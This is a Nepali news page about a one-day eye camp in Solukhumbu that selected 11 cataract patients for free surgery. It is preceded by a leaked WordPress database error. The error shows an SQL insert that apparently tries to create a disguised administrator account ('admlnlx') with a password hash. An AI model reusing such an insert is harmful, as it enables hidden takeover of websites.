WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfVe1Cqb.ajQkr/9vSxnDG1YnkKkyS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:37:39', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । माप्य दुधकोशी गाउँपालिका ६ वाकुमा आयोजित एक दिने आँखा शिविरबाट ११ जना मोतिबिन्दुका बिरामी छनौट गरिएको छ ।
आज माप्य दुधकोशी ६ स्थित हेल्पोष्टमा आयोजित आँखा शिबिरमा २२३ जनाले आँखा परीक्षण गरेको आँखा स्वास्थ्य कार्यकर्ता दिनेश राईले बताए । जिल्ला सामुदायिक आँखा केन्द सोलुखुम्बु, तिलगंगा आँखा प्रतिष्ठान, काठमाण्डौँको संयुक्त आयोजना तथा स्थानीय तहको समन्वयमा जिल्लाका विभिन्न स्थानमा शिविर संचालन गरिरहेकोछ ।
माप्य दुधकोशी गाउपालिकाको १ जुभिङ, ४ र ५ काँकुमा शिविर संचालन गरिसकेको छ । छनौट शिविरबाट छनौट भएको मोतिबिन्दुका बिरामीको निशुल्क शल्यक्रियाको लागि आगामी असोज २४ र २५ गते जिल्ला सामुदायिक आँखा केन्द्र फाप्लुमा शल्यक्रिया शिविरको आयोजना गरिएको राईले बताए ।